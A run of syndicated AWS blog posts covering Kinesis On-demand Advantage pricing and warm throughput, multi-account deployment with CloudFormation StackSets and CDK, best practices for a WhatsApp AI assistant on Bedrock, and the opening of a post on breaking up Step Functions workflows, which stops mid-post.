Today, AWS announced the new Amazon Kinesis Data Streams On-demand Advantage mode, which includes warm throughput capability and an updated pricing structure. With this feature you can enable instant scaling for traffic surges while optimizing costs for consistent streaming workloads. On-demand Advantage mode is a cost-effective way to stream with Kinesis Data Streams for use cases that ingest at least 10 MiB/s in aggregate or have hundreds of data streams in an AWS Region.

In this post, we explore this new feature, including key use cases, configuration options, pricing considerations, and best practices for optimal performance.

Real-world use cases

As streaming data volumes grow and use cases evolve, you can face two common challenges with your streaming workloads:

Challenge 1: Preparing for traffic spikes

Many businesses experience predictable but significant traffic surges during events like product launches, content releases, or holiday sales. Using an on-demand capacity mode, you have to complete several steps when preparing for traffic spikes:

  • Transition to provisioned mode
  • Manually estimate and increase shards based on anticipated peak demand
  • Wait for scaling operations to finish
  • Subsequently return to on-demand mode

This mode-switching process was time consuming, required careful planning, and introduced operational complexity, forcing customers to either accept this operational burden, overprovision capacity well in advance, or risk throttling during critical business periods when data ingestion reliability matters most.

Challenge 2: Cost optimization for consistent workloads

Organizations with large, consistent streaming workloads want to optimize costs without sacrificing the simplicity and scalability available with on-demand streams. On-demand capacity mode serves well for fluctuating data traffic, yet customers desired a more economical approach to handle high-volume streaming workloads.

On-demand Advantage directly address both challenges by providing the capability to warm on-demand streams and a new pricing structure. With the new On-demand Advantage mode, there is no longer a fixed, per-stream charge, and the throughput usage is priced at a lower rate. The only requirement is that the account commits to streaming with at least 25 MiB/s of data ingest and 25 MiB/s of data retrieval usage.

This launch improves data streaming across multiple industries:

  • Online gaming companies can now prepare their streams for game launches without the cumbersome process of switching between modes and manually calculating shard requirements
  • Media and entertainment providers can support smooth data ingestion during major content releases and live events
  • E-commerce services can handle holiday sales traffic while optimizing costs for their baseline workloads.

By combining instant scaling with cost efficiency, you can confidently manage both predictable traffic surges and consistent streaming volumes without compromising on performance or budget.

How it works

The key features of On-demand Advantage mode are warm throughput and committed-usage pricing.

Warm throughput

With the warm throughput feature, available once you’ve enabled On-demand Advantage mode, you can configure your Kinesis Data Streams on-demand streams to have instantly available throughput capacity up to 10 GiB/s. This means you can proactively prepare on-demand streams for expected peak traffic events without the cumbersome process of switching between provisioned modes and manually calculating shard requirements. Key benefits include:

  • The ability to prepare for peak events so you can handle traffic surges smoothly
  • Alleviation of the need to build custom scaling solutions
  • The capability to continue scaling automatically beyond warm throughput if needed, up to 10 GiB/s or 10 million events per second
  • No additional fee for maintaining warm capacity

Committed-usage pricing

When you’ve enabled On-demand Advantage mode, the billing for the on-demand streams switches to a new structure that removes the stream hour charge and offers a discount of at least 60% for the throughput usage. Based on US East (N. Virginia) pricing, data ingested is priced 60% lower, data retrieval is priced 60% lower, Enhanced fan-out data retrieval is 68% lower, and extended retention is priced 77% lower. In return, you commit to stream 25 MiB/s for at least 24 hours. Even when actual usage is lower, if you enable this setting, you’re charged for the minimum 25 MiB/s throughput at the discounted price. Overall, the signficant discounts offered means that On-demand Advantage is more cost-effective for use cases that ingest at least 10 MiB/s in aggregate, fan out to more than two consumer applications, or have hundreds of data streams in an AWS Region.

Getting started

Follow these steps to start using On-demand Advantage mode.

Enabling On-demand Advantage mode

To start using the On-demand Advantage mode:

In the AWS Management Console

  1. Navigate to the Kinesis Data Streams console
  2. Navigate to the Account Settings tab
  3. Choose Edit billing mode
  4. Select the On-demand Advantage option
  5. Select the checkbox, I acknowledge this change cannot be reverted for 24 hours
  6. Choose Save changes

on-demand-billing-mode

Using the AWS CLI

You can run the following CLI command to enable the minimum throughput billing commitment:

aws kinesis update-account-settings \
--minimum-throughput-billing-commitment Status=ENABLED

Using the AWS SDK

You can use the SDK to enable the minimum throughput billing commitment. The following Python example shows how to do it:

import boto3

client = boto3.client('kinesis')
response = client.update_account_settings(
    MinimumThroughputBillingCommitment={"Status": "ENABLED"}
)

Once enabled, you commit your stream to this pricing mode for a minimum period of 24 hours, after which you can opt out as needed.

Configuring warm throughput

To start using warm throughput for Kinesis Data Streams On-demand:

Using the AWS Management Console

  1. Navigate to the Kinesis Data Streams console
  2. Select your stream and go to the Configuration tab
  3. Choose Edit next to Warm Throughput
  4. Set your desired warm throughput (up to 10 GiB/s)
  5. Save your changes

Using the AWS CLI

You can run the following CLI command to enable the warm throughput:

aws kinesis update-stream-warm-throughput \
  --stream-name MyStream \
  --warm-throughput-mi-bps 1000

Using the AWS SDK:

You can use the SDK to enable warm throughput. The following Python example shows how to do it:

import boto3

client = boto3.client('kinesis')
response = client.update_stream_warm_throughput(
    StreamName='MyStream',
    WarmThroughputMiBps=1000
)

You can also create a new on-demand stream with warm throughput using the existing CreateStream API, or set warm throughput when converting a data stream from provisioned to On-demand Advantage mode.

Throttling and best practices for optimal performance

When working with warm throughput, it’s important to understand how capacity is managed. Each stream can instantly handle traffic up to the configured warm throughput level and will automatically scale beyond that as needed.

For optimal performance with warm throughput:

  1. Use a uniformly distributed partition key strategy to evenly distribute records across shards and avoid hotspots and consider your partition key strategy carefully as you can ingest a maximum of 1 MiB/s of data per partition key, regardless of the warm throughput configured.
  2. Monitor throughput metrics to adjust warm throughput settings based on actual usage patterns.
  3. Implement backoff and retry logic in producer applications to handle potential throttling.

For cost optimization with committed usage pricing:

  1. Analyze your daily throughput to verify it is at least 10 MiB/s.
  2. Consider consolidating streams across your organization to maximize the benefit of the discount for on-demand streams.
  3. Use cost effective data retrievals with – Use Enhanced Fan-Out – Use Enhanced Fan-Out consumers for applications that need dedicated throughput with 68% lower data retrievals cost in advantage mode.

Warm throughput in action

To demonstrate how warm throughput behaves, we enabled committed pricing in an AWS account and created two on-demand streams: “KDS-OD-STANDARD” and “KDS-OD-WARM-TP”. The “KDS-OD-WARM-TP” stream was configured with 100 MiB/second warm throughput, while “KDS-OD-STANDARD” remained as a regular on-demand stream without warm throughput, as demonstrated in the following screenshot.

od-standard-warm-streams

In our experiment, we initially simulated approximately 2 MiB/second traffic ingest for both “KDS-OD-STANDARD” and “KDS-OD-WARM-TP” streams. We used a UUID as a partition key so that traffic was evenly distributed across the shards of the Kinesis data streams, helping prevent potential hotspots that might skew our results. After establishing this baseline, we increased the ingest traffic to around 28 MiB/second within 10 minutes. We then further escalated the traffic to exceed 60 MiB/second within 15 minutes of the initial increase, as illustrated in the following screenshot.

streams-ingest-mb-second-metric

The following graph shows the ThrottledRecords CloudWatch metric for both “KDS-OD-STANDARD” and “KDS-OD-WARM-TP” that the warm throughput-enabled stream (“KDS-OD-WARM-TP”) did not encounter throttles during both traffic spikes, as it had 100 MiB/second warm throughput configured. In contrast, the standard on-demand stream (“KDS-OD-STANDARD”) experienced throttling when we increased traffic by 14x initially and by 2x later, before eventually scaling to bring throttles back to zero. This experiment demonstrates that you can use warm throughput to instantly prepare for peak usage times and avoid throttling during sudden traffic increases.

streams-throttle-metrics

Conclusion

As we outlined in this post, the new Amazon Kinesis Data Streams On-demand Advantage mode provides significant benefits for organizations of different sizes:

  • Instant scaling for predictable traffic surges without overprovisioning.
  • Cost optimization for consistent streaming workloads with at least 60% discount.
  • Simplified operations with no need to switch between different capacity modes.
  • Enhanced flexibility to handle both expected and unexpected traffic patterns.

With these enhancements you can build and operate real-time streaming applications at many scales. Kinesis Data Streams now provides the ideal combination of scalability, performance, and cost-efficiency.

To learn more about these new features, visit the Amazon Kinesis Data Streams documentation.


About the authors

Roy (KDS) Wang

Roy (KDS) Wang

Roy is a Senior Product Manager with Amazon Kinesis Data Streams. He is passionate about learning from and collaborating with customers to help organizations run faster and smarter. Outside of work, Roy strives to be a good dad to his new son and builds plastic model kits.

Pratik Patel

Pratik Patel

Pratik is Sr. Technical Account Manager and streaming analytics specialist. He works with AWS customers and provides ongoing support and technical guidance to help plan and build solutions using best practices and proactively keep customers’ AWS environments operationally healthy.

Umesh Chaudhari

Umesh Chaudhari

Umesh is a Sr. Streaming Solutions Architect at AWS. He works with customers to design and build real-time data processing systems. He has extensive working experience in software engineering, including architecting, designing, and developing data analytics systems. Outside of work, he enjoys traveling, following tech trends.

Simon Peyer

Simon Peyer

Simon is a Solutions Architect at AWS based in Switzerland. He is a practical doer and passionate about connecting technology and people using AWS Cloud services. A special focus for him is data streaming and automations. Besides work, Simon enjoys his family, the outdoors, and hiking in the mountains.20

Streamlining Multi-Account Infrastructure with AWS CloudFormation StackSets and AWS CDK

Post Syndicated from Franco Abregu original https://aws.amazon.com/blogs/devops/streamlining-multi-account-infrastructure-with-aws-cloudformation-stacksets-and-aws-cdk/

Introduction

Organizations operating at scale on AWS often need to manage resources across multiple accounts and regions. Whether it’s deploying security controls, compliance configurations, or shared services, maintaining consistency can be challenging.

AWS CloudFormation StackSets (StackSets) has been helping organizations deploy resources across multiple accounts and regions since its launch. While the service is powerful on its own, combining it with Infrastructure as Code (IaC) tools and implementing automated deployments can significantly enhance its capabilities.

In this post, we’ll show you how to leverage AWS CloudFormation StackSets at scale using AWS CDK and implement a robust CI/CD pipeline for automated deployments with AWS CodePipeline.

StackSets key concepts

AWS CloudFormation StackSets allows you to create, update, or delete CloudFormation stacks across multiple AWS accounts and regions with a single operation. It’s essentially a way to manage infrastructure at scale across your AWS organization. Using an administrator account, you define and manage a CloudFormation template, and use the template as the basis for provisioning stacks into selected target accounts across specified AWS Regions:

StackSets Overview

Figure 1. StackSets overview.

The Administrator Account is the AWS account where you create and manage StackSets and the Target Accounts are the AWS accounts where the stack instances are deployed.

The Stack Instances are individual stacks created from the StackSet template deployed to specific account-region combinations.

 You can make the following operations using StackSets: Create, update, and delete actions performed on stack instances. These operations can be applied in concurrent or sequential way.

Sequential Deployment:

  • Account-by-account deployment
  • Region-by-region within accounts
  • Configurable failure thresholds

Parallel Deployment:

  • Concurrent account deployments
  • Maximum concurrent account setting
  • Region priority configuration

Hybrid Deployment:

  • Combine sequential and parallel
  • Account group-based deployment
  • Regional deployment strategies

The power of StackSets

The use of StackSets allows us to extend AWS CloudFormation’s capabilities in several important ways:

Governance

It provides you with Centralized Management as a single point of control while including consistent deployment patterns and automated stack instance management across AWS accounts and regions.

With Drift Detection feature, you can identify if any of the stack instances of your StackSet have configuration differences according to its expected configuration. You detect changes made outside CloudFormation and changes made to an instance stack through CloudFormation directly without using the StackSet.

Flexible Deployment

You also have flexible deployment options with controlled rollout. For example, with Concurrent Deployments you can deploy to multiple accounts within each region simultaneously while controlling deployment order. It also includes failure tolerance with automated retry failed operations.

Operational Efficiency

It reduces manual effort in managing multi-account and multi-region environments while minimizes human error in deployments.

Cost Management

It delivers comprehensive resource organization and streamlined tracking of resources across accounts and regions containing instance stacks. Using centralized management, simplifies the resource tracking and organization enabling you you to have:

  • unified visibility: view all related stacks from a single StackSet console (with their deployment status)
  • consistent tagging: apply standardized tags across all stack instances for cost allocation and resource grouping
  • drift detection: run drift detection across all stack instances simultaneously
  • operations tracking: track all operations (create, update and delete) across account/regions from one place

Built-in Safety

You can establish maximum concurrent operation limits, failure tolerance thresholds and automatic retry mechanisms. You also have recovery capabilities through update operations. All these features make a built-in safety mechanisms that prevent widespread failures.

Let’s say you have 100 target accounts, with the maximum concurrent limits, you can for example deploy a change to only 10 accounts. Also, with a failure threshold you can set how many failures do you allow before automatically stopping the process (e.g., stop if more than 5 accounts fail). This way you can gradually deploy and test your templates with a little group, establishing failure thresholds, instead of affecting the stacks preventing mass failures.

When an operation fails, AWS CloudFormation performs a rollback in the stack instances deploying the previous working template. You will still need to correct the template and apply it again in all the stack instances. With StackSets, you can fix the issues in the template and run again an update across all the stacks including the concurrent limit and failure threshold mentioned before to safety test the fix.

Security and Compliance management

This security-focused approach with StackSets helps organizations maintain a strong security posture across their AWS environment while reducing the operational overhead of managing security at scale.

You can use StackSets to deploy standardized security policies across accounts, enforce security baselines automatically and implement security guardrails organization-wide. For example, you can deploy detective control resource and its configuration in all your accounts like Amazon GuardDuty or Amazon Macie. You can also deploy preventive controls like SCPs, AWS Firewall Manager or AWS Shield Advanced. For example you can deploy through StackSets the following CloudFormation template en each target account to block certain actions in a region:

<code>AWSTemplateFormatVersion: '2010-09-09'</code><br /><code>Description: 'Service Control Policy to block access to specific AWS regions'</code><br /><br /><code>Parameters:</code><br /><code>  PolicyName:</code><br /><code>    Type: String</code><br /><code>    Default: 'RegionDenyPolicy'</code><br /><code>    Description: 'Name for the Service Control Policy'</code><br /><code>    </code><br /><code>  PolicyDescription:</code><br /><code>    Type: String</code><br /><code>    Default: 'Blocks access to Singapore region (ap-southeast-1) while allowing global services'</code><br /><code>    Description: 'Description for the Service Control Policy'</code><br /><code>    </code><br /><code>  BlockedRegion:</code><br /><code>    Type: String</code><br /><code>    Default: 'ap-southeast-1'</code><br /><code>    Description: 'AWS Region to block access to'</code><br /><code>    AllowedValues:</code><br /><code>      - 'ap-southeast-1'</code><br /><code>      - 'ap-southeast-2'</code><br /><code>      - 'eu-west-3'</code><br /><code>      - 'us-west-1'</code><br /><code>      - 'ca-central-1'</code><br /><code>    </code><br /><code>  TargetOUId:</code><br /><code>    Type: String</code><br /><code>    Description: 'Organizational Unit ID to attach the policy to (e.g., ou-root-xxxxxxxxxx)'</code><br /><code>    </code><br /><code>Resources:</code><br /><code>  RegionDenySCP:</code><br /><code>    Type: AWS::Organizations::Policy</code><br /><code>    Properties:</code><br /><code>      Name: !Ref PolicyName</code><br /><code>      Description: !Ref PolicyDescription</code><br /><code>      Type: SERVICE_CONTROL_POLICY</code><br /><code>      Content:</code><br /><code>        Version: '2012-10-17'</code><br /><code>        Statement:</code><br /><code>          - Sid: DenyAccessToSpecificRegion</code><br /><code>            Effect: Deny</code><br /><code>            NotAction:</code><br /><code>              - 'route53:*'</code><br /><code>              - 'cloudfront:*'</code><br /><code>              - 'sts:*'</code><br /><code>            Resource: '*'</code><br /><code>            Condition:</code><br /><code>              StringEquals:</code><br /><code>                'aws:RequestedRegion':</code><br /><code>                  - !Ref BlockedRegion</code><br /><code>      TargetIds:</code><br /><code>        - !Ref TargetOUId</code><br /><code>      Tags:</code><br /><code>        - Key: Purpose</code><br /><code>          Value: RegionCompliance</code><br /><code>        - Key: ManagedBy</code><br /><code>          Value: CloudFormation</code><br /><br /><code>Outputs:</code><br /><code>  PolicyId:</code><br /><code>    Description: 'ID of the created Service Control Policy'</code><br /><code>    Value: !Ref RegionDenySCP</code><br /><code>    Export:</code><br /><code>      Name: !Sub '${AWS::StackName}-PolicyId'</code><br /><code>      </code><br /><code>  PolicyArn:</code><br /><code>    Description: 'ARN of the created Service Control Policy'</code><br /><code>    Value: !GetAtt RegionDenySCP.Arn</code><br /><code>    Export:</code><br /><code>      Name: !Sub '${AWS::StackName}-PolicyArn'</code>

Other capabilities include compliance-related resources consistently, maintain audit trails of security configurations and ensure regulatory requirements are met across all accounts. For example, you can enable CouldTrail and deploy AWS Config rules across all the instance stacks managed by the StackSet.

For both Security and Compliance incidents you can use StackSets to deploy automated response workflows, configure event notifications and implement remediation actions across your accounts and regions.

Import existing stacks into StackSets

A stack import operation can import existing stacks into new or existing StackSets, so that you can migrate existing stacks to a StackSet in one operation.

Solution Overview

This solution includes an AWS CodePipeline stack that creates a CI/CD pipeline to deploy our StackSet. This pipeline deploys an application stack containing the AWS CloudFormation StackSet with a monitoring dashboard in AWS CloudWatch.

Solution overview

Figure 2. Solution overview

The following Amazon CloudWatch dashboard is an example of what you will in the target accounts after the StackSet is deployed:

Dashboard example

Figure 3. Dashboard example

In the CI/CD pipeline, before running the deployment commands, it applies python security and quality code checks to ensure code quality and security and cdk-nag to ensure AWS Well Architected best practices. You can find more details about these checks in the solution repository in README.md file.

The solution includes 2 AWS CloudFormation stacks defined by in the AWS CDK application and a template for the StackSet that will be deployed in the target accounts and regions. This stack contains the monitoring dashboard that will be deployed en the target regions of each target account as a single unit.

The idea of using AWS CodePipeline with IaC is that development teams can define and share “pipelines-as-code” patterns for deploying their applications making it easy to add stages. This way, security and quality code testing can run any time you change the source code.

Pipeline overview

Figure 4. Pipeline overview

The best practice is to ensure shift-left: adding this checks to the earlier stages of the SDLC. You can accomplish this complementing your CI/CD pipeline with githooks or IDE Plugins. For example with Amazon Q Developer IDE extension you can use the review function to analyze the security of your code locally.

Walkthrough

If you’d like to try this solution out yourself, visit the walkthrough in the corresponding GitHub repo: https://github.com/aws-cloudformation/aws-cloudformation-templates/tree/main/CloudFormation/StackSets-CDK

To use the CI/CD pipeline just create a repository using any of the AWS CodeConnection git supported providers and add the contents of the folder. All details are included in the README.md so you can always get the latest version of the code and how it works.

Conclusion

In this post, we showed how to use AWS CDK to deploy AWS CloudFormation StackSets to reduce operational overhead and ensure consistency, compliance and security across multiple regions and accounts. We also learned how to create a CI/CD pipeline to guarantee a robust DevSecOps cycle for our Infrastructure as Code.

Now that we’ve explored the main concepts together, you can clone the example repository from the walkthrough section, follow the setup instructions, and customize the implementation to enhance AWS resources management across accounts and regions. Whether you’re managing a single account or multiple organizations, these practices can be adapted to your specific needs. Now that you learned the main concepts, go ahead and clone the example repository from walkthrough section, follow the setup instructions and customize the implementation to improve the AWS resources management across your accounts and regions.

Franco Abregu

Franco Abregu is a Sr. Delivery Consultant – DevOps at AWS Professional Services based in Argentina. Franco focuses on transforming customers DevOps culture to improve developer productivity, operations, deployments and process standardization. His expertise includes CI/CD, Infrastructure as Code, software development and organizational adoption of DevOps culture.

Idriss Laouali Abdou

Idriss Laouali Abdou is a Sr. Product Manager Technical for AWS Infrastructure-as-Code based in Seattle. He focuses on improving developer productivity through StackSets and CloudFormation Infrastructure provisioning experiences. Outside of work, you can find him creating educational content for thousands of students, cooking, or dancing..

Best practices for building high-performance WhatsApp AI assistant using AWS

Post Syndicated from Pavlos Ioannou Katidis original https://aws.amazon.com/blogs/messaging-and-targeting/best-practices-for-building-high-performance-whatsapp-ai-assistant-using-aws/

WhatsApp is one of the most widely used messaging platforms globally, making it an ideal

channel for customer engagement. Whether you’re building a virtual assistant, a customer AI assistant, or an internal communication tool, developing a WhatsApp AI assistant presents unique design and operational challenges.

In this post, we explore best practices for building a WhatsApp AI assistant using AWS services—with a focus on how the AWS Summit Assistant used AWS End User Messaging and Amazon Bedrock to power a responsive, secure, and scalable generative AI assistant.

Why build a WhatsApp AI assistant with AWS End User Messaging

AWS offers a comprehensive set of services that can seamlessly handle the full lifecycle of a WhatsApp interaction—from ingesting and validating inbound messages, storing session context, generating AI responses, to monitoring key performance indicators in real time.

AWS End User Messaging provides native integration with WhatsApp, so you can send and receive messages directly using a REST API or SDK. It also supports AWS Identity and Access Management (IAM), enabling fine-grained control over access, authentication, and user roles.

The following sections outline best practices for designing, building, and operating WhatsApp AI assistants on AWS. Although not every recommendation will apply to every use case, they are based on real-world lessons learned from production deployments like the AWS Summit Assistant.

Use a modular, event-driven architecture

Rather than relying on tightly coupled services or monolithic workflows, design your WhatsApp AI assistant as a set of loosely coupled, modular components. AWS services such as Amazon Simple Notification Service (Amazon SNS), Amazon Simple Queue Service (Amazon SQS), and AWS Lambda are ideal for building scalable, event-driven systems.

By default, AWS End User Messaging publishes inbound WhatsApp messages and engagement events to an SNS topic. To manage throughput and avoid overwhelming downstream components, subscribe an SQS queue to this topic. With this setup, you can process messages at a controlled pace and buffer traffic during bursts.

Depending on your use case, you might choose to skip dead-letter queues (DLQs) in favor of logging failures to Amazon CloudWatch Logs, especially given the real-time nature of chatbots where retrying a failed message hours later might no longer be relevant. Instead, the AI assistant should respond to the user immediately, explaining the issue and suggesting corrective actions such as rephrasing their question or trying again later.

A typical modular structure might have the following components:

  • SQS queue – An SQS queue subscribed to the WhatsApp Messages & Events SNS topic to control throughput and isolate retries.
  • A messages processor function for inbound processing and audio processing (optional) – This AWS Lambda function handles initial validation and message-type filtering and transcribes the voice message. The output is published to the Processed messages SNS topic.
  • Fan-out to downstream consumers – Other Lambda functions through Amazon SQS subscribe to the Processed messages SNS topic to handle specialized tasks like response generation using Amazon Bedrock or categorization and analytics’ purposes.

The following diagram illustrates the solution architecture.

architecture diagram whatsapp chatbot

This fan-out architecture promotes clean separation of concerns, avoids redundant processing, and makes it straightforward to introduce new capabilities such as sentiment analysis or content moderation by simply adding new subscribers. By decoupling components and using Amazon SNS and Amazon SQS patterns, each part of the system can scale independently and recover gracefully from localized failures.

Design for controlled processing throughput

When integrating with other AWS services such as Amazon Bedrock, with soft service quotas, it’s critical to manage throughput carefully. Use Amazon SQS to decouple the SNS topic from Lambda invocations. This makes sure spikes in message volume don’t result in throttling or failed invocations. It also lets you scale consumer Lambda functions based on queue depth, allowing for burst handling without dropping messages. In cases where message failure is unrecoverable (such as invalid content or unsupported message types), log the error and notify the user with a helpful message rather than retrying. This keeps the user informed and prevents queues from growing unnecessarily due to retry cycles. This design pattern of Amazon SNS to Amazon SQS to Lambda is foundational for building resilient, scalable AI assistants that meet user expectations for speed and reliability.

Handle voice messages with Amazon Transcribe or Whisper

WhatsApp voice messages are received in OGG format. To process these messages, you can use the AWS End User Messaging GetWhatsAppMessageMedia API to retrieve media files, including audio, images, and video. The audio needs to be converted to a compatible format for transcription: PCM for Amazon Transcribe or WAV for Hugging Face Whisper (available through Amazon Bedrock Marketplace). This conversion can be achieved using a library like FFmpeg, implemented as a Lambda layer.

The processing flow involves fetching audio from WhatsApp, which is then automatically stored in Amazon Simple Storage Service (Amazon S3) in a bucket you create and own (this is the default behavior of the GetWhatsAppMessageMedia API). Next, the audio is converted to the required format and stored locally in Lambda for faster processing before being transcribed.

As a best practice, consider deleting audio files after processing to simplify data management and reduce storage requirements for personally identifiable information (PII). This approach facilitates efficient handling and transcription of WhatsApp voice messages while maintaining data privacy standards.

Enforce strict message validation

To promote quality and security, implement layered validation within your message processing Lambda function. This might differ depending your use case and requirements:

  • Message status indicators – Mark inbound messages as read and indicate you are responding to maintain the recipients’ interest while generating a response. WhatsApp’s API allows marking messages as read by message ID and setting the typing indicator to true. The typing indicator automatically dismisses after 25 seconds without a reply.
  • Message type validation – Filter by message type using the inbound WhatsApp message payload’s type field. Implement checks based on your AI assistant’s supported message types and provide static responses for unsupported formats. For example, a text only AI assistant shouldn’t process message types such as Media, Reaction, Template, Location, Contacts or Interactive.
  • Size limit protection – Add message size validation based on character count. This prevents resource drainage from potential bad actors who might attempt to send extremely large text chunks that could generate excessive large language model (LLM) input tokens.
  • Conversation management – Track message counts and total character length per conversation, resetting the context when necessary to manage costs and prevent resource drainage. Implement this using Amazon DynamoDB with the recipient’s hashed phone number as the primary key.
  • Processing lock mechanism – Prevent duplicate processing by implementing a flag system in DynamoDB. When processing a message, set the recipient’s flag to true. While active, new messages receive a static response indicating that a previous message is being processed, avoiding out-of-sync responses and resource waste.
  • Access control – Consider implementing an allow list for beta functionality or controlled access. This provides selective AI assistant activation for testing while restricting general audience access when needed.
  • Error handling – Manage response generation failures with clear, static replies to the customer. Include troubleshooting steps or alternative contact channels based on the issue’s severity to maintain a positive user experience.

Security

Consider the following security best practices for message processing systems:

  • Encryption standards – Encrypt SNS topics, SQS queues, and DynamoDB tables using AWS Key Management Service (AWS KMS) service managed keys or customer managed keys (CMKs) to facilitate data protection at rest and in transit.
  • PII data protection – For analytics and troubleshooting purposes, avoid logging raw phone numbers when the full number isn’t required. Instead, implement hashing of phone numbers before logging to maintain user privacy while preserving tracking capabilities.
  • Data retention management – Enable Time-To-Live (TTL) attributes on DynamoDB tables to automatically purge old session data, maintaining data hygiene and avoiding storing PII data when not needed.
  • Content safety controls – Implement Amazon Bedrock Guardrails to prevent processing or generating unwanted content and messages. When required, use the data loss protection features of Amazon Bedrock Guardrails to safeguard sensitive information.
  • LLM security framework – Follow OWASP’s top 10 risk & mitigations for LLMs and Gen AI Apps guidelines to filter unsafe or inappropriate content in generative responses, maintaining a secure and appropriate interaction environment.

Use Amazon Bedrock for generative responses and categorization

The AWS Summit Assistant used two key Amazon Bedrock capabilities:

  • Amazon Bedrock Knowledge Bases – Powered by Amazon Bedrock Knowledge Bases using OpenSearch vector embeddings and Anthropic on Amazon Bedrock, the AI assistant could answer user questions using publicly available event data.
  • Categorization – Using the InvokeModel API, inbound messages were tagged with categories for analytics. A DynamoDB table stored category counts, enabling trend detection across users.

Sessions persisted using the Amazon Bedrock native session ID feature for consistent conversation flow.

Monitoring

Consider the following monitoring and data analysis options:

  • Message status tracking – WhatsApp provides six distinct events per message. Though valuable, these should be complemented with AWS service operational metrics for comprehensive monitoring. These events are published on the WhatsApp SNS topic in your AWS account.
  • Real-time monitoring with CloudWatch – Set up CloudWatch alarms to track SNS message publication rates, providing real-time visibility into WhatsApp activity for both inbound and outbound messages. Extend monitoring to include Lambda function and Amazon Bedrock metrics. For tracking WhatsApp’s six message states, implement a dedicated Lambda function that subscribes to the WhatsApp SNS topic and records each event as a custom CloudWatch metric.
  • Detailed analysis with CloudWatch Logs Insights – Use CloudWatch Logs Insights for granular monitoring with minimal development overhead. This approach enables advanced queries for metrics not available through standard CloudWatch metrics, such as unique conversation counts and user engagement statistics. The logs’ content depends on your requirements.
  • Advanced analytics integration – For sophisticated use cases, implement a data pipeline using Amazon Data Firehose to store events in Amazon S3, then visualize using business intelligence tools like Amazon Quick Sight for custom dashboards. For a reference implementation, refer to the following GitHub repo.

Example use case: AWS Summit Assistant

Deployed at AWS Summit Dubai 2025, AWS Summit Johannesburg 2025, AWS Cloud Day Türkiye, AWS Cloud Day Riyadh and re:Inforce re:Cap London 2025, this WhatsApp AI assistant performed the following functions:

  • Used Amazon Bedrock Knowledge Bases to answer attendee questions
  • Transcribed voice messages using Whisper
  • Categorized questions for trend reporting
  • Operated with near real-time responsiveness using Amazon SNS, Amazon SQS, and Lambda

The AI assistant processed over 2,000 questions with no service interruptions, showing the viability of serverless architecture for WhatsApp-based assistants.

Conclusion

Building a scalable and secure WhatsApp AI assistant with AWS offers numerous advantages for businesses looking to enhance customer engagement. By using AWS services like AWS End User Messaging, Amazon Bedrock, Lambda, and DynamoDB, builders can create robust, AI-powered assistants that handle high message volumes while maintaining security and performance. Key takeaways include:

  • Adopting a modular, event-driven architecture for flexibility and scalability
  • Implementing thorough message validation and security measures
  • Using Amazon Bedrock for advanced Gen AI capabilities
  • Establishing comprehensive monitoring and analytics

Although these practices provide a strong foundation, they represent just a subset of possible best practices. As WhatsApp and AWS services grow and industry standards change, best practices continue to evolve. Stay current by regularly reviewing AWS documentation and keeping up with new feature releases.

To get started with your WhatsApp AI assistant implementation, refer to the Github repository Chat Orchestrator for Generative AI Conversations.


About the authors

Breaking down monolith workflows: Modularizing AWS Step Functions workflows

Post Syndicated from Sahithi Ginjupalli original https://aws.amazon.com/blogs/compute/breaking-down-monolith-workflows-modularizing-aws-step-functions-workflows/

You can use AWS Step Functions to orchestrate complex business problems. However, as workflows grow and evolve, you can find yourself grappling with monolithic state machines that become increasingly difficult to maintain and update. In this post, we show you strategies for decomposing large Step Functions workflows into modular, maintainable components. We dive deep into architectural patterns like parent-child workflows, domain-based separation, and shared utilities that can help you break down complexity while maintaining business functionality. By implementing these decoupling techniques, you can achieve faster deployments, better error isolation, and reduced operational overhead – all while keeping your workflows scalable and efficient. Whether you’re dealing with payment processing, data transformation, or complex business logic, these patterns will help you build more resilient and manageable Step Functions applications.

The Complexity of Single-State Machine Architectures

While monolithic workflows can be suitable for simple, linear processes with limited states and clear dependencies, they become problematic when handling complex business logic across multiple domains. If your workflow involves more than 15-20 states, crosses multiple business domains, or requires frequent updates from different teams, it’s a strong indicator that you should consider a decomposed approach instead of a monolithic one. However, monolithic workflows remain a valid choice for scenarios with straightforward business logic, single-team ownership, infrequent changes, and workflows with less than 15 states – especially when rapid development and simplified debugging are priorities.

Let’s examine a real-world example of such a monolithic workflow and understand the challenges it presents for development teams, operational efficiency, and business agility. Below is an example of a state machine that is a mix of payment processes, inventory management, and notification mechanisms for an e-commerce implementation:

Figure 1: A state machine that is a mix of payment processes, inventory management, and notification mechanisms for an e-commerce implementation

Figure 1: A state machine that is a mix of payment processes, inventory management, and notification mechanisms for an e-commerce implementation

State Explosion

Modifying a single state in a monolithic workflow triggers a cascade of changes across multiple interconnected states due to their tight coupling and dependencies. For example, adding a new payment method would require modifications across various states including validation, processing, and error handling, creating a ripple effect throughout the workflow. This inter dependency makes even simple changes complex and risky, as altering one component can have unintended consequences on other parts of the workflow.

Looking at the provided architecture, we can see a clear example of state explosion where a single workflow handles multiple business processes including order validation, payment processing, inventory management, shipping calculations, and customer notifications. This creates a complex web of dependent states that becomes increasingly difficult to manage. The result is a “spider web” of states that becomes progressively harder to understand, debug, and maintain.

Version Management

Version management in monolithic workflows requires deploying the entire workflow even for minor changes to individual components, making it difficult to isolate and update specific business logic. The provided architecture demonstrates the version management challenge clearly. For instance, if the shipping calculation logic needs an urgent fix, the entire workflow must be redeployed, requiring comprehensive testing of all components, including unmodified ones, to ensure nothing breaks in the process.

Resource Limitations

While not immediately visible in the architecture diagram, Monolithic workflows face operational constraints as they grow in complexity, particularly with state transitions, maximum event payload size, and execution history size. Refer to the Service quotas documentation to understand such limits. These constraints become critical bottlenecks as workflows grow in complexity and handle increased transaction volumes. In the monolithic state machine, long-running operations like payment processing and shipping calculations, combined with multiple state transitions, could approach these limits, especially for high-volume scenarios.

Additionally, we also come across generic design challenges such as error handling. In monolithic approach, workflows leads to redundant try-catch blocks and retry configurations across different operations. This creates challenges in implementing distinct error strategies for different business scenarios and makes it difficult to maintain proper rollback mechanisms when failures occur in middle states.

These challenges collectively highlight the need for a more modular approach to Step Functions workflow design.

Transforming Complex Workflows Through Decomposition

When transforming complex monolithic workflows into more manageable components, you can employ several decomposition strategies to achieve better modularity and maintainability. These strategies include the parent-child pattern, which creates a hierarchical structure of workflows, domain separation that breaks down workflows based on business capabilities, shared utilities that serve as reusable components for common operations, and specialized error workflows for centralized error handling. Each of these strategies can be implemented either individually or in combination, depending on the specific requirements and complexity of the application, allowing organizations to create more efficient, scalable, and maintainable Step Functions workflows while ensuring proper separation of concerns and reduced operational overhead.

